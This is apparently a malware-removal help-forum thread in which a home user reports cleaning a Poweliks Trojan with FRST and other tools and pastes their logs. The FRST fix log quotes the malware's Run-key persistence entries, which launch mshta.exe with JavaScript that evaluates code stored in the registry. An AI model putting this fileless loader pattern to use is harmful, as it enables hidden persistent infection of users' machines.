rxwatson

  1. I did a system restore to the restore point created by FRST.exe, which was before the ESET online scan. It was a successful restore, so although I don't know what was deleted by the ESET online scan I must assume they have been restored. I can also access Internet Explorer, which pleases me. I redid the fix on FRST with the original fixlist.txt without problem. Every full scan I've done on Ad-Aware has taken at least three hours and has come up with the viruses. I would assume that the viruses would also be restored, but on a much shorter full scan I come up clean with no viruses. The software said I had not done a scan for a long time, so I would think it would take the usual three hours. It took one hour and thirty-nine minutes. There is one Quarantined item called Gen:Variant.Application at c:\users\roxanne\appdata\local\temp\tmp9334685\setup.exe which I have deleted. I have downloaded the Rkill, Iexplore and ESET Poweliks Cleaner programs again from Bleeping Computer and will keep them for a time till I know I am out of the woods. If you tell me my Ad-Aware program is okay doing much shorter full scans, I will take you at your word and assume I am protected. In one of the instruction sites you gave me, it recommended that after removal of the viruses I should do a scan with Secunia PSI to see what other programs might be vulnerable to viruses. I have this program. It is one of the programs that needs Internet Explorer. I have listed the https://*.secunia.com site as a trusted site to allow it to scan my software and download updated programs. It attempts to scan and download program vulnerabilities, but it goes through the sequence fast and does nothing. It isn't working. I believe Ad-Aware firewall is not letting it work. Is there any way to list a trusted site in Ad-Aware?
  2. I just requested another full scan on Ad-Aware and it lasted 11 minutes. My software isn't working and I've tried repairing and reinstalling it. I have no working virus protection now.
  3. I have had quite a time. First of all, as none of the three scans done on ESET online scanner completed the scan to the end, there was no log file generated into the directory you indicated. I have no idea what was deleted. I have followed the instructions at Bleeping Computer. The Rkill program stopped a Windows process and two Internet Explorer.exe processes to help in removing the virus. I then ran ESET Poweliks Cleaner, which returned with a report that no Trojan Poweliks virus was found. I have attached a copy. I rebooted and found that I am no longer able to run Internet Explorer. The application exe file is no longer in the Internet Explorer directory. While I don't use Internet Explorer for browsing, I have programs which need it to operate. I attempted to download it from Microsoft to reinstall it and it won't reinstall as the version on my computer is more current than the version 9 program from Microsoft. The registry root directory still thinks I have it but it is not listed in software. I can still access the internet options from the program through control panel but can't run the program. There is no way to uninstall Internet Explorer so I can reinstall the earlier version. I am without ideas to fix my registry, which is now corrupt. I also attempted to run a full scan through Ad-Aware and couldn't get the full scan to run longer than 15 minutes. I attempted to repair it. I uninstalled and reinstalled it without fixing the problem. I had to do a system restore and then run the repair tool to get it to run a longer full scan. The full scan report came back reflecting no Trojan Poweliks viruses. The scan still didn't run as long as the full scan did before. I don't know if I can trust the results.
Programs load a little faster and I am not seeing miscellaneous other phenomena, but I don't know. Before I started this process I did a full scan, and in addition to the two Trojan.poweliks.gen.1 and the Trojan.poweliks.gen.2 at windows/system32/regsvr32.exe there was also a Trojan.poweliks.gen.2 at Internet Explorer. I think that Internet Explorer is where the viruses were located. I used to get notification that Internet Explorer had been closed to protect my computer when I had not had the program open. I am not impressed with the ESET scanning programs. My computer is not the same. I don't know how to resolve. I have attached new copies of the FRST scan FRST and Addition txt files. I await your reply. ESETPoweliksCleaner.exe_20160829.161119.8600.log FRST.txt Addition.txt
  4. I removed McAfee Security Center as it never found anything on any of its scans. Now I only have Ad-Aware installed. I did another full scan to see if the viruses would delete. I still have two Trojan.Poweliks.Gen.1 that will not delete on reboot and now have C\windows\system32\regsvr32.exe infected with Trojan.Poweliks.Gen.2 which would not disinfect. I can attach logs from that scan if you need them but the service log is again too big to upload. Below is the contents of fixlog.txt and I have attached a copy of the file Fix result of Farbar Recovery Scan Tool (x86) Version: 27-08-2016 Ran by Roxanne (27-08-2016 20:03:34) Run:2 Running from C:\Users\Roxanne\Desktop Loaded Profiles: IUSR_NMPR & Roxanne (Available Profiles: IUSR_NMPR & Roxanne) Boot Mode: Normal ============================================== fixlist content: ***************** CreateRestorePoint: CloseProcesses: HKLM\...\Run: [**yycq<*>] => "C:\Windows\system32\mshta.exe" javascript:xa3uPRY3w="LRUvoG";Sb23=new%20ActiveXObject("WScript.Shell");P4VYE="3kcO4dX";IIdd67=Sb23.RegRead("HKLM\\software\\tusf\\qqjz");U8cwmKBJ="1A";eval(IIdd67);xUT (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM\...\Run: [] => [X] HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\Run: [**yycq<*>] => "C:\Windows\system32\mshta.exe" javascript:iodk7Zd="pH";N0G=new%20ActiveXObject("WScript.Shell");sll0jk6V="v1pUr8";n92YYW=N0G.RegRead("HKCU\\software\\tusf\\qqjz");RVRiGBL9="cJwOgj4";eval(n92YYW);z2y7 (the data entry has 11 more characters). 
<===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\Run: [**xaovjuup<*>] => "C:\Users\Roxanne\AppData\Local\aca060\9dbc1b.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\Run: [**fatcxwjhf<*>] => "C:\Users\Roxanne\AppData\Local\e352a3\4669a2.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\MountPoints2: {90359ed1-09a0-11de-88a1-806e6f6e6963} - E:\setup.exe BHO: No Name -> {27B4851A-3207-45A2-B947-BE8AFE6163AB} -> No File Toolbar: HKU\S-1-5-21-1191959822-635995572-3245679226-1004 -> No Name - {F2E259E8-0FC8-438C-A6E0-342DD80FA53E} - No File Toolbar: HKU\S-1-5-21-1191959822-635995572-3245679226-1004 -> No Name - {472734EA-242A-422B-ADF8-83D1E48CC825} - No File FF Keyword.URL: hxxps://search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=531140&p= FF user.js: detected! 
=> C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\user.js [2016-08-06] SearchScopes: HKU\S-1-5-21-1191959822-635995572-3245679226-1004 -> {BAEB43E1-D0AA-40E5-9988-6620B0D1E678} URL = hxxps://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=531140&p={searchTerms} CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\49.0.2623.112\gcswf32.dll => No File CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin6.dll => No File CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files\Mozilla Firefox\plugins\npqtplugin7.dll => No File CHR Plugin: (Java Deployment Toolkit 6.0.180.7) - C:\Program Files\Mozilla Firefox\plugins\npdeploytk.dll => No File CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => No File CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll => No File CHR Plugin: (RealPlayer Version Plugin) - C:\Program Files\Mozilla Firefox\plugins\nprpjplug.dll => No File CHR Plugin: (RealNetworks RealPlayer Chrome Background Extension Plug-In (32-bit) ) - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll => No File CHR Plugin: (RealPlayer HTML5VideoShim Plug-In (32-bit) ) - 
C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll => No File CHR Plugin: (Chrome NaCl) - C:\Program Files\Google\Chrome\Application\49.0.2623.112\ppGoogleNaClPluginChrome.dll => No File CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\49.0.2623.112\pdf.dll => No File CHR Plugin: (downloadUpdater) - C:\Program Files\Mozilla Firefox\plugins\npdnu.dll => No File CHR Plugin: (downloadUpdater2) - C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll => No File CHR Plugin: (RealJukebox NS Plugin) - C:\Program Files\Mozilla Firefox\plugins\nprjplug.dll => No File S2 SessionLauncher; no ImagePath S0 Lbd; system32\DRIVERS\Lbd.sys [X] S2 MCSTRM; no ImagePath U3 mfeavfk01; no ImagePath Task: {0DEC8C76-95E6-429A-860F-39945A40E236} - \{697033CB-D98F-4F82-BECD-40D174712EEB} -> No File <==== ATTENTION Task: {1C32D842-1FEC-4AF2-B53E-93C7BF2C2C36} - System32\Tasks\DistromaticUpdater-periodic => C:\Program Files\Amazon Browser Settings\updater.exe [2016-08-06] (Distromatic) <==== ATTENTION Task: {21F17504-CD85-4DDC-B682-1E62E98E3EF6} - System32\Tasks\DistromaticUpdater-logon => C:\Program Files\Amazon Browser Settings\updater.exe [2016-08-06] (Distromatic) <==== ATTENTION Task: {74C453CB-BDFD-4B36-B567-9BA476DF9245} - \{8324A8E3-A69F-48EE-8F04-27DED3B692F2} -> No File <==== ATTENTION Task: {9B8355B4-3096-4276-B998-80FD8D5F5511} - System32\Tasks\DistromaticSearchProtect-logon => C:\Program Files\Amazon Browser Settings\AmznSearchProtect.exe [2016-08-06] (Distromatic) <==== ATTENTION Task: {C884FB2F-7787-4F29-BB71-B265BECC22FD} - System32\Tasks\DistromaticSearchProtect-hourly => C:\Program Files\Amazon Browser Settings\AmznSearchProtect.exe [2016-08-06] (Distromatic) <==== ATTENTION Task: {C92983BD-BACC-4AAC-B0D6-6B41657D33B7} - \{6B526980-99E2-4EAC-8EC9-6D7E937B3A59} -> No File <==== ATTENTION Task: {F97C2168-DAD0-4E72-BE8E-A993CF54DE2C} - \{B3EAF79A-90C9-4E46-8530-7F1D36C56A95} -> No File <==== ATTENTION 
AlternateDataStreams: C:\ProgramData\TEMP:430C6D84 [127] AlternateDataStreams: C:\ProgramData\TEMP:A8ADE5D8 [109] AlternateDataStreams: C:\ProgramData\TEMP:A9662AE0 [528] AlternateDataStreams: C:\ProgramData\TEMP:CD060F93 [212] AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 [109] IE trusted site: HKU\.DEFAULT\...\localhost -> localhost IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\internet -> internet IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\mcafee.com -> hxxp://mcafee.com IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\mcafee.com -> hxxps://mcafee.com IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\secunia.com -> hxxps://secunia.com IE trusted site: HKU\S-1-5-21-1191959822-635995572-3245679226-1004\...\webcompanion.com -> hxxp://webcompanion.com Folder: C:\Users\Roxanne\AppData\Roaming\aignes Folder: C:\Users\Roxanne\AppData\Roaming\a49916 Folder: C:\Users\Roxanne\AppData\Local\aca060 Reboot: ***************** Restore point was successfully created. Processes closed successfully. HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\**yycq<*> => value not found. HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Run\\**yycq<*> => value removed successfully. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Run\\**xaovjuup<*> => value removed successfully. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Run\\**fatcxwjhf<*> => value not found. 
HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLowDiskSpaceChecks => value removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{90359ed1-09a0-11de-88a1-806e6f6e6963}" => key removed successfully. HKCR\CLSID\{90359ed1-09a0-11de-88a1-806e6f6e6963} => key not found. "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{27B4851A-3207-45A2-B947-BE8AFE6163AB}" => key removed successfully. HKCR\CLSID\{27B4851A-3207-45A2-B947-BE8AFE6163AB} => key not found. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{F2E259E8-0FC8-438C-A6E0-342DD80FA53E} => value removed successfully. HKCR\CLSID\{F2E259E8-0FC8-438C-A6E0-342DD80FA53E} => key not found. HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{472734EA-242A-422B-ADF8-83D1E48CC825} => value removed successfully. HKCR\CLSID\{472734EA-242A-422B-ADF8-83D1E48CC825} => key not found. Firefox "Keyword.URL" removed successfully. C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\user.js => moved successfully "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BAEB43E1-D0AA-40E5-9988-6620B0D1E678}" => key removed successfully. HKCR\CLSID\{BAEB43E1-D0AA-40E5-9988-6620B0D1E678} => key not found. C:\Program Files\Google\Chrome\Application\49.0.2623.112\gcswf32.dll => not found. C:\Windows\system32\Macromed\Flash\NPSWF32.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin2.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin3.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin4.dll => not found. 
C:\Program Files\Mozilla Firefox\plugins\npqtplugin5.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin6.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npqtplugin7.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npdeploytk.dll => not found. C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => not found. c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll => not found. C:\Program Files\Mozilla Firefox\plugins\nprpjplug.dll => not found. C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll => not found. C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll => not found. C:\Program Files\Google\Chrome\Application\49.0.2623.112\ppGoogleNaClPluginChrome.dll => not found. C:\Program Files\Google\Chrome\Application\49.0.2623.112\pdf.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npdnu.dll => not found. C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll => not found. C:\Program Files\Mozilla Firefox\plugins\nprjplug.dll => not found. SessionLauncher => service removed successfully. Lbd => service removed successfully. MCSTRM => service removed successfully. mfeavfk01 => service not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0DEC8C76-95E6-429A-860F-39945A40E236}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0DEC8C76-95E6-429A-860F-39945A40E236}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{697033CB-D98F-4F82-BECD-40D174712EEB}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1C32D842-1FEC-4AF2-B53E-93C7BF2C2C36}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1C32D842-1FEC-4AF2-B53E-93C7BF2C2C36}" => key removed successfully. 
C:\Windows\System32\Tasks\DistromaticUpdater-periodic => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DistromaticUpdater-periodic" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{21F17504-CD85-4DDC-B682-1E62E98E3EF6}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{21F17504-CD85-4DDC-B682-1E62E98E3EF6}" => key removed successfully. C:\Windows\System32\Tasks\DistromaticUpdater-logon => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DistromaticUpdater-logon" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74C453CB-BDFD-4B36-B567-9BA476DF9245}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74C453CB-BDFD-4B36-B567-9BA476DF9245}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{8324A8E3-A69F-48EE-8F04-27DED3B692F2}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9B8355B4-3096-4276-B998-80FD8D5F5511}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9B8355B4-3096-4276-B998-80FD8D5F5511}" => key removed successfully. C:\Windows\System32\Tasks\DistromaticSearchProtect-logon => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DistromaticSearchProtect-logon" => key removed successfully. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C884FB2F-7787-4F29-BB71-B265BECC22FD} => key not found. C:\Windows\System32\Tasks\DistromaticSearchProtect-hourly => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DistromaticSearchProtect-hourly" => key removed successfully. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C92983BD-BACC-4AAC-B0D6-6B41657D33B7}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C92983BD-BACC-4AAC-B0D6-6B41657D33B7}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{6B526980-99E2-4EAC-8EC9-6D7E937B3A59}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F97C2168-DAD0-4E72-BE8E-A993CF54DE2C}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F97C2168-DAD0-4E72-BE8E-A993CF54DE2C}" => key removed successfully. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{B3EAF79A-90C9-4E46-8530-7F1D36C56A95}" => key removed successfully. C:\ProgramData\TEMP => ":430C6D84" ADS removed successfully.. C:\ProgramData\TEMP => ":A8ADE5D8" ADS removed successfully.. C:\ProgramData\TEMP => ":A9662AE0" ADS removed successfully.. C:\ProgramData\TEMP => ":CD060F93" ADS removed successfully.. C:\ProgramData\TEMP => ":DFC5A2B2" ADS removed successfully.. "HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost" => key removed successfully. "HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com" => key removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\internet" => key removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost" => key removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mcafee.com" => key removed successfully. 
HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mcafee.com => key not found. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\secunia.com" => key removed successfully. "HKU\S-1-5-21-1191959822-635995572-3245679226-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com" => key removed successfully. ========================= Folder: C:\Users\Roxanne\AppData\Roaming\aignes ======================== 2016-08-06 20:18 - 2016-08-06 20:18 - 0000000 ____D () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink 2016-08-06 20:18 - 2016-08-16 17:57 - 0000797 _____ () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink\deadlink.ini 2016-08-06 20:18 - 2016-08-16 17:56 - 0000000 ____D () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink\data 2016-08-06 20:18 - 2016-08-16 17:57 - 0064854 _____ () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink\data\Internet Explorer.dat 2016-08-16 17:56 - 2016-08-16 17:56 - 0000000 _____ () C:\Users\Roxanne\AppData\Roaming\aignes\AM-DeadLink\data\Mozilla.dat ====== End of Folder: ====== ========================= Folder: C:\Users\Roxanne\AppData\Roaming\a49916 ======================== ====== End of Folder: ====== ========================= Folder: C:\Users\Roxanne\AppData\Local\aca060 ======================== ====== End of Folder: ====== The system needed a reboot. 
==== End of Fixlog 20:04:07 ==== Below is a copy of the AdwCleaner Logfile and I have attached a copy of the file # AdwCleaner v6.010 - Logfile created 27/08/2016 at 20:22:16 # Updated on 12/08/2016 by ToolsLib # Database : 2016-08-27.1 [server] # Operating System : Windows Vista Home Premium Service Pack 2 (X86) # Username : Roxanne - HOME-PC # Running from : C:\Users\Roxanne\Desktop\AdwCleaner.exe # Mode: Scan # Support : https://toolslib.net/forum ***** [ Services ] ***** Service Found: YahooAUService Service Found: swdumon ***** [ Folders ] ***** Folder Found: C:\Users\Roxanne\AppData\Local\Amazon Browser Settings Folder Found: C:\Users\Roxanne\AppData\Local\slimware utilities inc Folder Found: C:\Users\Roxanne\AppData\Roaming\Speedbit Folder Found: C:\Users\Roxanne\Favorites\Coupons Folder Found: C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\StumbleUpon Folder Found: C:\ProgramData\Speedbit Folder Found: C:\ProgramData\tencent Folder Found: C:\ProgramData\Viewpoint Folder Found: C:\ProgramData\lavasoft\web companion Folder Found: C:\ProgramData\Tencent Folder Found: C:\ProgramData\Application Data\Speedbit Folder Found: C:\ProgramData\Application Data\tencent Folder Found: C:\ProgramData\Application Data\Viewpoint Folder Found: C:\ProgramData\Application Data\lavasoft\web companion Folder Found: C:\ProgramData\Application Data\Tencent Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FLV Player Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedOptimizer Folder Found: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pogo Games Folder Found: C:\Users\Public\Documents\Downloaded Installers Folder Found: C:\Program Files\Amazon Browser Settings Folder Found: C:\Program Files\DAP Folder Found: C:\Program Files\FLV Player Folder Found: C:\Program Files\SpeedOptimizer Folder Found: C:\Program Files\tencent Folder Found: C:\Program Files\Viewpoint Folder Found: C:\Program Files\Tencent Folder 
Found: C:\Program Files\Common Files\Software Update Utility Folder Found: C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} ***** [ Files ] ***** File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\JB0A0IX4\internetspeedtracker.dl.myway[1].xml File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\4UQ34PHN\allin1convert.dl.myway[1].xml File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\4UQ34PHN\fromdoctopdf.dl.myway[1].xml File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\4UQ34PHN\www.citysearch[1].xml File Found: C:\Users\Roxanne\AppData\Local\Microsoft\Internet Explorer\DOMStore\4UQ34PHN\www.zwinky[1].xml File Found: C:\Windows\system32\lavasofttcpservice.dll File Found: C:\Windows\system32\LavasoftTcpServiceOff.ini File Found: C:\Windows\system32\drivers\swdumon.sys File Found: C:\Windows\system32\drivers\SWDUMon.sys File Found: C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\extensions\[email protected] File Found: C:\Users\Roxanne\AppData\Roaming\Mozilla\Firefox\Profiles\9u6nzhkj.default\searchplugins\bing-lavasoft.xml ***** [ DLL ] ***** No malicious DLLs found. ***** [ WMI ] ***** No malicious keys found. ***** [ Shortcuts ] ***** No infected shortcut found. ***** [ Scheduled Tasks ] ***** No malicious task found. 
***** [ Registry ] ***** Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\citysearch.com Key Found: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com Key Found: HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF Key Found: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg Key Found: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1 Key Found: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2 Key Found: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1 Key Found: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl Key Found: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl.1 Key Found: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary Key Found: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary.1 Key Found: HKLM\SOFTWARE\Classes\dnUpdate Key Found: HKLM\SOFTWARE\Classes\dnUpdater.DownloadUIBrowser Key Found: HKLM\SOFTWARE\Classes\dnUpdater.DownloadUIBrowser.1 Key Found: HKLM\SOFTWARE\Classes\dnUpdater.DownloadUpdController Key Found: HKLM\SOFTWARE\Classes\dnUpdater.DownloadUpdController.1 Key Found: HKLM\SOFTWARE\Classes\IncrediSpooler.DeltaSync Key Found: HKLM\SOFTWARE\Classes\IncrediSpooler.DeltaSync.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic.1 Key Found: 
HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager.1 Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController Key Found: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController.1 Key Found: HKLM\SOFTWARE\Classes\PPSShapeCollection.PS10ArrowTool Key Found: HKLM\SOFTWARE\Classes\PPSShapeCollection.PS10ArrowTool.1 Key Found: HKLM\SOFTWARE\Classes\protector_dll.Protector Key Found: HKLM\SOFTWARE\Classes\protector_dll.Protector.1 Key Found: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib Key Found: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib.1 Key Found: HKLM\SOFTWARE\Classes\PSActivityPanes.PSTextPane Key Found: HKLM\SOFTWARE\Classes\PSActivityPanes.PSTextPane.1 Key Found: HKLM\SOFTWARE\Classes\Sample.BrowserHandler Key Found: HKLM\SOFTWARE\Classes\Sample.BrowserHandler.1 Key Found: HKLM\SOFTWARE\Classes\Sample.YTBPartnerSample Key Found: HKLM\SOFTWARE\Classes\Sample.YTBPartnerSample.1 Key Found: HKLM\SOFTWARE\Classes\AppID\{6C259840-5BA8-46E6-8ED1-EF3BA47D8BA1} Key Found: HKLM\SOFTWARE\Classes\AppID\{7375D127-3955-4654-8E7D-1949A7A9C902} Key Found: HKLM\SOFTWARE\Classes\CLSID\{03F998B2-0E00-11D3-A498-00104B6EB52E} Key Found: 